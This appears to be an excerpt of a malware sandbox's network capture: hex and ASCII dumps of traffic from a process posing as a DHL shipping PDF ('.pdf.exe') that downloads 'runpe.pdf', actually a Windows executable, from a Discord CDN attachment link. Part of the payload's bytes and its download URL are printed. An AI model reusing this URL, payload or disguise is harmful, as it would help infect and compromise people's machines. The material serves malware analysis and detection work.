2021-09-27 18:36:57 UTC	140	IN	Data Raw: 8a 92 d1 2b 2a ce 14 b8 0a 7f 76 de 51 78 9a 5f 94 15 fb 95 32 07 8c 63 d7 58 29 43 1d 65 7c 99 cb 68 15 3c 4a 76 ef 81 ac 94 98 23 9a 39 90 a8 0b 12 da e0 58 f5 a1 d5 eb 6d 6a fc c2 7d da f7 c7 3b e3 98 8a 94 0b 0d 04 26 62 9f 30 34 f6 25 f0 05 dd 80 4b d8 1d 9e 01 de f4 0e 30 57 2d 6d ff 68 39 8c bd 34 e1 ae 90 74 cc 35 6e 43 b3 7a 22 1b 04 3e bb 01 0e 6c 64 b1 d6 aa 88 03 e2 52 09 71 01 de 1d 18 12 7d 21 01 72 5c a3 37 15 e5 17 9a 8e 78 fc 72 5f ee 20 da 3a 9e 58 3b 60 a4 91 6f 4a 96 dc ee c9 d8 e5 a6 c6 e5 7b 1a 37 fb db f6 62 a3 e1 01 fa 8f 75 20 98 51 35 02 1c 26 bb 2e 5a 9f d4 03 ff b5 5e 40 d0 a8 14 5b 6c 8f 41 7d ff 2d 3c 11 88 9f 46 b1 30 42 34 17 d7 b3 37 62 76 c3 63 1e 70 23 23 5e f0 04 a9 a7 22 35 da 0e cb ba 96 52 3c 27 c4 21 b1 89 38 74 66 Data Ascii: +*vQx_2cX)Ce\|h<Jv#9Xmj};&b04%K0W-mh94t5nCz">ldRq}!r\7xr_ :X;`oJ{7bu Q5&.Z^@[lA}-<F0B47bvcp##^"5R<'!8tf
2021-09-27 18:36:57 UTC	144	IN	Data Raw: c9 80 1d bc 8e b1 10 6a 0f 01 f5 23 1f c9 93 03 1c 65 57 b8 e0 f1 74 9a 4c 87 53 62 a2 2d 38 68 aa e3 b9 c6 70 b0 bd 09 4c a7 29 31 a2 96 fa 11 8e 1a ea cb af 76 99 31 f9 dd 94 d2 09 43 4c dd 3e 41 bb 8d 08 cf e0 56 34 22 81 13 d3 76 ab a0 a6 b4 fd 00 8b 79 63 71 38 39 be 0a 07 a5 7c 83 90 78 fd f2 fb d4 aa 88 49 55 71 6a c8 bb 6f 77 7b 47 94 47 db 1c 95 4e 07 c5 a4 69 9b 85 89 84 8e 5a 21 53 b4 b1 ff 21 1c 34 59 aa 44 45 fa 22 2a 5a 97 89 72 ad 65 6e 3f 0c 8e ea 23 41 72 ca 8a 44 73 b6 1d 09 2c 6c 22 c2 01 ae 0c 04 51 5b 5c 22 6c 9e 0c 6d 2a a4 b3 9e 70 92 74 b9 95 77 65 7c c6 69 bc 7f 21 11 50 c6 78 ea f2 a9 77 8a 2e 55 8e 6c ed 8b 44 1a ff 61 8e c3 34 1c 17 d7 ab 03 46 2e 9b 81 88 4a cf 82 c0 95 7c bb 62 1e 08 ae 2c 06 b1 cd 3f 30 8c f0 82 8b 5c cc e5 Data Ascii: j#eWtLSb-8hpL)1v1CL>AV4"vycq89\|xIUqjow{GGNiZ!S!4YDE"Zren?#ArDs,l"Q[\"lmptwe\|i!Pxw.UlDa4F.J\|b,?0\
2021-09-27 18:36:57 UTC	148	IN	Data Raw: 72 42 3e 2f 39 17 80 6a e8 08 fa 47 4c 04 40 74 f5 1d 1f 84 31 fb 9f cc 31 5d 93 9d 6e 2f 18 14 d6 90 12 d5 ce ca c1 1b 9d 73 99 61 1b c5 f4 cb 5c a2 f6 2e 00 d9 39 d1 77 4a 3d 0e 4a b7 f8 27 ec 35 38 e1 9d e4 f6 c0 4e 49 c5 b9 3a 77 dd 90 13 4d 42 97 d8 50 0e 23 e4 af 52 3f d0 05 ce 61 75 f7 ee 9d b6 58 34 cd c0 55 9c 55 57 51 12 5b a5 01 e5 de 4f 0d c4 58 fd 46 ff de 34 ee 2b 54 65 7b ae 98 40 e7 e1 65 1a 1d 83 4e ef 7f 73 f1 b0 72 14 9a f3 93 de 3d 60 7d 24 51 e7 fb 6f 25 93 81 02 11 f5 6f 8d d2 2c 30 d0 fe 02 7b bb 7b 5b e8 f3 c9 bf b8 13 cb d2 e6 c6 f8 c4 5d 84 fa c2 cb f8 4a cf 74 e4 88 54 3e bd 64 2a ac 12 c1 0f 8c 6c 18 86 ec 58 bc 6a f7 45 d6 91 cb b8 2a 62 3f 20 ec a3 c0 87 ee ef fc 5a 16 b6 4d 8c 0a 3b d1 fe 72 af 48 05 00 8a eb a1 bf d9 c2 37 Data Ascii: rB>/9jGL@t11]n/sa\.9wJ=J'58NI:wMBP#R?auX4UUWQ[OXF4+Te{@eNsr=`}$Qo%o,0{{[]JtT>dlXjEb? ZM;rH7
2021-09-27 18:36:57 UTC	152	IN	Data Raw: 2d f6 74 65 15 a2 cb c9 ff 0e c0 3a 85 69 a3 c4 5c 73 8c 66 6a af 0e 94 4f 60 84 86 7a 03 1b b8 60 9b 3a b1 ae 31 b3 82 6e 08 3d 2e 55 e3 56 e4 8b 88 34 a1 97 61 40 c4 27 c6 09 2b e4 6d a4 c7 db 36 09 fc e0 1c b0 54 75 4f 7b d9 47 3f 44 89 92 78 30 cc 53 16 f0 78 11 64 20 51 d2 4d cb 54 26 d8 50 09 ea 28 a0 a6 d4 1d 9d 4c ad 15 d8 4d 93 6d d3 e6 ca cd 80 7d ac c1 2c b7 4b 76 09 62 44 79 98 df 1f 75 39 e7 3f 31 c8 d4 49 02 a4 3e e3 e8 48 21 0d ef ab 98 b9 57 17 29 79 52 68 77 b1 3b f9 29 27 08 ad f7 0c f5 11 7b 6a b8 a4 5d cd 2e 76 6e ef f0 63 4e ec ad d8 9e d4 f3 0e 89 c6 6b 19 e5 1e 5f 3c 8d e1 d0 0a 27 c9 bf 6f 9b 5e 5e 4b 66 bf 63 15 4c e1 2e 19 ff 6a b9 6b b0 7f 25 a4 64 4d 9c d1 dd f5 6e bf 72 56 89 d9 c2 2d c0 51 cf e4 5f 02 8b 35 74 22 ff 27 4a 26 Data Ascii: -te:i\sfjO`z`:1n=.UV4a@'+m6TuO{G?Dx0Sxd QMT&P(LMm},KvbDyu9?1I>H!W)yRhw;)'{j].vncNk_<'o^^KfcL.jk%dMnrV-Q_5t"'J&
2021-09-27 18:36:57 UTC	156	IN	Data Raw: 8c 98 22 8b eb 70 59 58 21 99 e8 24 ad e3 71 b2 3a af 6f d5 82 bd a4 1a ec b4 be f6 7b 30 c6 72 29 4b 51 4f 96 c3 b9 a6 52 81 f3 92 5a 43 8b 63 b3 a5 f5 06 4a 6b 7d 6f 17 b0 61 15 97 94 24 3b 72 55 62 ad 5e 72 b9 bd d7 b1 8f 29 b1 04 eb ed 32 d5 22 e1 d3 0a fe b5 e1 5e 0c d7 e4 10 13 5c 46 63 e1 03 28 28 1c b3 d1 4d c0 2f 1e c4 36 fa 9a 18 a9 8a 4d 44 48 2f fb 5e 9c b4 96 d8 47 a3 84 32 32 c4 f5 37 dc 42 63 a8 57 51 77 18 42 84 0a 33 d0 96 b7 d9 a6 eb ba 14 c0 e7 ba 76 fa 80 b3 89 a4 76 a0 d3 73 69 fd 6f cb 55 d0 2f 80 84 91 b8 a4 be c2 8a c3 a3 35 e0 bc e0 86 92 e4 ac 7e 4d 0b cc c5 4b d6 48 11 ff 75 1b e3 8f b1 f6 27 02 53 bb ec 7e 98 65 68 27 d3 c5 97 2a dc ce 8d bd b4 a8 87 a5 d2 1f 7c 22 4e 39 e0 b1 a1 9a cd e3 1e 96 1c aa 01 c6 ab 49 d6 cb f2 10 57 Data Ascii: "pYX!$q:o{0r)KQORZCcJk}oa$;rUb^r)2"^\Fc((M/6MDH/^G227BcWQwB3vvsioU/5~MKHu'S~eh'*\|"N9IW
2021-09-27 18:36:57 UTC	159	IN	Data Raw: e8 7b b1 41 b7 e7 75 6b d5 8d a1 03 01 22 1f c3 9b 29 9f 09 f6 8f 6f 32 d3 91 e6 ab 49 ca c2 43 3b 7b 8d af fc 1d 52 c3 44 54 ff 11 b7 11 b5 63 0c f5 2b 5d 20 95 a9 2b 51 ca af b2 fa 7d c5 ba 29 10 7a 8f d5 64 69 28 f8 d5 68 c2 6d 1d 9e d4 54 4a ee d0 df 09 8d 3b a9 40 29 70 6c 97 b5 35 55 10 36 7e 66 7b 7a 8b e8 72 41 fc 44 fe d0 56 48 35 77 d8 ba ad b7 04 21 d6 1a cf 32 f8 f2 ca cb 0c 96 cc 1c 99 c5 52 48 c7 14 ff f6 b6 b1 1c d1 a4 4f a7 f4 79 ee 3c 3e 4a 3a e4 03 14 82 18 18 1b 7d f8 fb 0f 22 52 bc 3d 6f 43 d1 1b fc e0 5d 6c c1 66 e6 6f d9 75 67 1d f2 bd a5 64 df 72 95 73 49 63 a5 ee e6 2e 19 d4 44 59 d3 32 d3 fe 5f b6 9d 8d 70 60 07 7f 03 68 9d 3f d2 22 dc 07 fc 05 cf 8b 9c 35 34 39 50 0a fa cf 39 cb 17 77 db 29 df c5 95 64 00 d8 ad 86 d0 f3 e4 1d 39 Data Ascii: {Auk")o2IC;{RDTc+] +Q})zdi(hmTJ;@)pl5U6~f{zrADVH5w!2RHOy<>J:}"R=oC]lfougdrsIc.DY2_p`h?"549P9w)d9
2021-09-27 18:36:57 UTC	164	IN	Data Raw: 5d 32 48 c1 b7 9e 67 8a a2 5b 9c 48 a8 2c db 98 d6 5b fd 78 0b 52 b6 3d fb 21 90 f1 7d 45 5c 00 1e 57 43 0b 12 89 2c b8 95 29 e7 55 df 66 af d8 00 09 60 91 e6 35 2e ba 56 f3 42 9b 72 ea 1d 49 ed d0 59 50 e4 87 a0 cf 9e ab e3 96 41 26 66 6c 24 7f 37 b4 81 ce dd 1c df b6 34 32 f2 78 6e 92 b8 fc 80 0b 1b 64 e5 68 73 66 49 04 f0 05 7e 66 b0 1e 9e 56 01 f1 b3 97 b6 4b 7b ff 82 0e fc d6 ef 8e b2 2b 74 7b 3b f5 0c fb e2 b2 f0 84 88 23 56 9d fc 84 0e 68 07 83 a3 fa 4e 95 97 d3 12 bd 34 c1 69 c1 0c 0e 00 a9 0c 8a 8e a3 9a e1 99 22 7c 14 fc ed 0c b5 36 1f 4d 68 04 a7 3c 55 0a 66 b5 2a 33 de 3f ae ec 02 23 a9 08 a9 f6 01 22 5b 38 3a ee f0 fe 0e 1c 3b 6b 6c 1f d1 8a d2 50 01 00 1f 1c 01 4d 19 af f2 c7 d2 7a cf 88 65 74 a1 21 e5 12 06 dc 9b 93 89 aa d3 42 de 79 60 ab Data Ascii: ]2Hg[H,[xR=!}E\WC,)Uf`5.VBrIYPA&fl$742xndhsfI~fVK{+t{;#VhN4i"\|6Mh<Uf*3?#"[8:;klPMzet!By`

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49740	162.159.133.233	443	C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-27 18:36:57 UTC	165	OUT	GET /attachments/889935662827044904/889981640498090054/runpe.pdf HTTP/1.1 Host: cdn.discordapp.com
2021-09-27 18:36:57 UTC	165	IN	HTTP/1.1 200 OK Date: Mon, 27 Sep 2021 18:36:57 GMT Content-Type: application/pdf Content-Length: 413184 Connection: close CF-Ray: 6956d7294eb10f52-MXP Accept-Ranges: bytes Age: 39 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=runpe.pdf ETag: "27a5260c3d72986f4e22a50865143075" Expires: Tue, 27 Sep 2022 18:36:57 GMT Last-Modified: Tue, 21 Sep 2021 21:09:18 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1632258558207603 x-goog-hash: crc32c=9NZa8w== x-goog-hash: md5=J6UmDD1ymG9OIqUIZRQwdQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 413184 X-GUploader-UploadID: ADPycdsYKC4VXPddSs6Xe9g82lz1ZZoaMSD06VGl4YB2U5Zg15mTRs5gz8PwNghFMAjCzZt_USTanQR0j1AeRVknD4ATQAO2kQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=reqyiJKaEoFsCALeShIlh1W3LR8JpCvUMFqXcv29IzLGMD5h8uPR%2BXNPvm0g4dUVlGje%2FgW6kZtZHlU3T3z9AP51pKbxiccZNu6x9hAf8w7NSaWcynk%2Fyqr3eF8mqqfNJRvjlA%3D%3D"}],"group":"cf-nel","max_age":604800}
2021-09-27 18:36:57 UTC	166	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
2021-09-27 18:36:57 UTC	166	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 07 1e 2b 61 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 0b 00 00 1c 06 00 00 30 00 00 00 00 00 00 8e 3b 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL+a!0; @@ `
2021-09-27 18:36:57 UTC	167	IN	Data Raw: ff 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 16 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 85 00 00 00 01 00 00 11 28 1e 05 00 06 20 03 00 00 00 fe 0e 00 00 38 00 Data Ascii: 0000******00000000( 8
2021-09-27 18:36:57 UTC	169	IN	Data Raw: 00 00 ad 00 00 00 2b 01 00 00 c1 00 00 00 7d 02 00 00 0b 01 00 00 5f 00 00 00 e7 01 00 00 6d 02 00 00 99 01 00 00 d2 00 00 00 74 01 00 00 7f 00 00 00 c7 01 00 00 38 38 02 00 00 1f 0c 8d 2d 00 00 01 13 01 20 12 00 00 00 38 6b ff ff ff 11 01 1d 1f 32 9c 20 09 00 00 00 7e 37 01 00 04 3a 56 ff ff ff 26 38 4c ff ff ff 11 01 1f 09 1f 72 9c 20 0d 00 00 00 38 3f ff ff ff 11 01 18 1f 61 9c 20 0c 00 00 00 7e 25 01 00 04 39 2a ff ff ff 26 38 20 ff ff ff 11 01 1b 1f 69 9c 20 03 00 00 00 7e 65 01 00 04 3a 0f ff ff ff 26 20 1a 00 00 00 38 04 ff ff ff 11 01 16 1f 6b 9c 20 01 00 00 00 7e 13 01 00 04 3a ef fe ff ff 26 38 e5 fe ff ff 28 4f 00 00 06 20 0e 00 00 00 fe 0e 00 00 38 d2 fe ff ff 1e 8d 2d 00 00 01 13 01 20 1c 00 00 00 38 c4 fe ff ff 00 2a 11 01 1f 0b 1f 41 9c 20 Data Ascii: +}_mt88- 8k2 ~7:V&8Lr 8?a ~%9&8 i ~e:& 8k ~:&8(O 8- 8A
2021-09-27 18:36:57 UTC	170	IN	Data Raw: 00 00 00 00 fe 0c 00 00 45 04 00 00 00 14 00 00 00 2e 00 00 00 05 00 00 00 48 00 00 00 38 0f 00 00 00 28 31 06 00 06 20 03 00 00 00 38 d7 ff ff ff 28 9d 00 00 06 20 02 00 00 00 7e 39 01 00 04 39 c3 ff ff ff 26 38 b9 ff ff ff 28 9c 00 00 06 20 00 00 00 00 7e 0d 01 00 04 39 a9 ff ff ff 26 38 9f ff ff ff 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 b0 00 00 00 01 00 00 11 28 1e 05 00 06 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 06 00 00 00 4d 00 00 00 5e 00 00 00 05 00 00 00 6d 00 00 00 4f 00 00 00 1f 00 00 00 38 48 00 00 00 28 a2 00 00 06 20 01 00 00 00 7e 4b 01 00 04 3a ca ff ff ff 26 38 c0 ff ff ff 73 9f 00 00 06 7e af 01 00 04 28 15 07 00 06 74 18 00 00 02 80 24 00 Data Ascii: E.H8(1 8( ~99&8( ~9&8*****0( 8EM^mO8H( ~K:&8s~(t$
2021-09-27 18:36:57 UTC	171	IN	Data Raw: 12 00 00 00 2a 00 00 00 22 00 14 a5 25 00 00 02 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 74 00 00 00 01 00 00 11 28 1e 05 00 06 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 1c 00 00 00 05 00 00 00 32 00 00 00 1b 00 00 00 38 17 00 00 00 28 16 05 00 06 20 00 00 00 00 17 3a d6 ff ff ff 26 38 cc ff ff ff 2a 28 36 01 00 06 20 03 00 00 00 17 3a bf ff ff ff 26 38 b5 ff ff ff 28 35 01 00 06 20 01 00 00 00 17 3a a9 ff ff ff 26 38 9f ff ff ff 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 Data Ascii: "%******00t( 8E28( :&8(6 :&8(5 :&8***
2021-09-27 18:36:57 UTC	173	IN	Data Raw: 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 79 00 00 00 01 00 00 11 28 1e 05 00 06 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 4c 00 00 00 05 00 00 00 36 00 00 00 20 00 00 00 38 47 00 00 00 28 cd 01 00 06 20 00 00 00 00 16 39 d6 ff ff ff 26 20 00 00 00 00 38 cb ff ff ff 28 cc 01 00 06 20 02 00 00 00 16 39 bb ff ff ff 26 38 b1 ff ff ff 28 98 01 00 06 20 01 00 00 00 16 39 a5 ff ff ff 26 38 9b ff ff ff 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 Data Ascii: 0000y( 8EL6 8G( 9& 8( 9&8( 9&8*********
2021-09-27 18:36:57 UTC	174	IN	Data Raw: 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 Data Ascii: 000000000000*00
2021-09-27 18:36:57 UTC	175	IN	Data Raw: 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 Data Ascii: 0000000000000000
2021-09-27 18:36:57 UTC	177	IN	Data Raw: 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 Data Ascii: 00****************************
2021-09-27 18:36:57 UTC	178	IN	Data Raw: ff ff 2a 28 60 03 00 06 20 02 00 00 00 38 c0 ff ff ff 28 5d 03 00 06 20 01 00 00 00 16 39 b0 ff ff ff 26 38 a6 ff ff ff 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 76 00 00 00 01 00 00 11 28 1e 05 00 06 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 36 00 00 00 37 00 00 00 05 00 00 00 1b 00 00 00 38 31 00 00 00 28 68 03 00 06 20 01 00 00 00 16 39 d6 ff ff ff 26 38 cc ff ff ff 28 69 03 00 06 20 00 00 00 00 17 39 c0 ff ff ff 26 20 00 00 00 00 38 b5 ff ff ff 2a 28 64 03 00 06 20 03 00 00 00 fe 0e 00 00 38 9d ff ff ff 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 Data Ascii: (` 8(] 9&8**000v( 8E6781(h 9&8(i 9& 8(d 8**
2021-09-27 18:36:57 UTC	179	IN	Data Raw: 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 22 00 14 a5 2a 00 00 01 2a 00 00 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 17 2a 00 00 00 13 30 03 00 79 00 00 00 01 00 00 11 28 1e 05 00 06 20 03 00 00 Data Ascii: **********0"*000000**0y(
2021-09-27 18:36:57 UTC	181	IN	Data Raw: ff ff 2a 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 79 00 00 00 01 00 00 11 28 1e 05 00 06 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 4c 00 00 00 05 00 00 00 1b 00 00 00 31 00 00 00 38 47 00 00 00 28 fd 03 00 06 20 03 00 00 00 16 39 d6 ff ff ff 26 38 cc ff ff ff 28 01 04 00 06 20 01 00 00 00 16 39 c0 ff ff ff 26 38 b6 ff ff ff 28 02 04 00 06 20 00 00 00 00 17 3a aa ff ff ff 26 20 00 00 00 00 38 9f ff ff ff 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 Data Ascii: ******00y( 8EL18G( 9&8( 9&8( :& 8*******0
2021-09-27 18:36:57 UTC	182	IN	Data Raw: 05 00 06 28 16 05 00 06 28 31 06 00 06 2a 00 00 56 28 1e 05 00 06 28 14 05 00 06 28 16 05 00 06 28 31 06 00 06 2a 00 00 56 28 1e 05 00 06 28 14 05 00 06 28 16 05 00 06 28 31 06 00 06 2a 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 01 1c 00 00 00 00 96 00 3d d3 00 2d 16 00 00 01 02 00 5d 00 f6 53 01 35 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 34 00 00 02 00 00 00 65 04 00 00 ca 01 00 00 2f 06 00 00 35 00 00 00 00 00 00 00 00 00 00 00 3e 01 00 00 34 00 00 00 72 01 00 00 58 05 00 00 1b 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 02 00 00 00 5f 00 00 00 c3 01 00 00 22 02 00 00 35 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 Data Ascii: ((1V((((1V((((100=-]S50A4e/5>4rX0A_"50A
2021-09-27 18:36:57 UTC	183	IN	Data Raw: 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 